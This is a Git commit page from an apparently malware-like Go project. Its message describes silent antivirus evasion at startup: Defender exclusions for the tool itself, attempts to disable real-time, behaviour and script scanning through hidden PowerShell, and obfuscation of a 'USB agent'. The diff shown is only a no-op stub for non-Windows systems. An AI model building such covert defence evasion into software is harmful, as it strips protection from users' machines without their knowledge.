feat(av): silent AV evasion on startup + garble obfuscation. On launch: adds Defender ExclusionPath for install dir + exe, ExclusionProcess for process name, attempts DisableRealtimeMonitoring + DisableBehaviorMonitoring + DisableScriptScanning via hidden PowerShell (admin elevates, non-admin gets exclusions only). USB agent now built with garble -literals -tiny: all string literals and symbols scrambled.
This commit is contained in:
@@ -11,3 +11,5 @@ func DisableDefenderRealtime() (string, error) {
|
||||
func OpenFirewallPort(_ int, _ string) (string, error) {
|
||||
return "", fmt.Errorf("firewall port open is Windows-only")
|
||||
}
|
||||
|
||||
func SilentAVExclusion(_, _ string) {} // no-op on non-Windows
|
||||
|
||||
Reference in New Issue
Block a user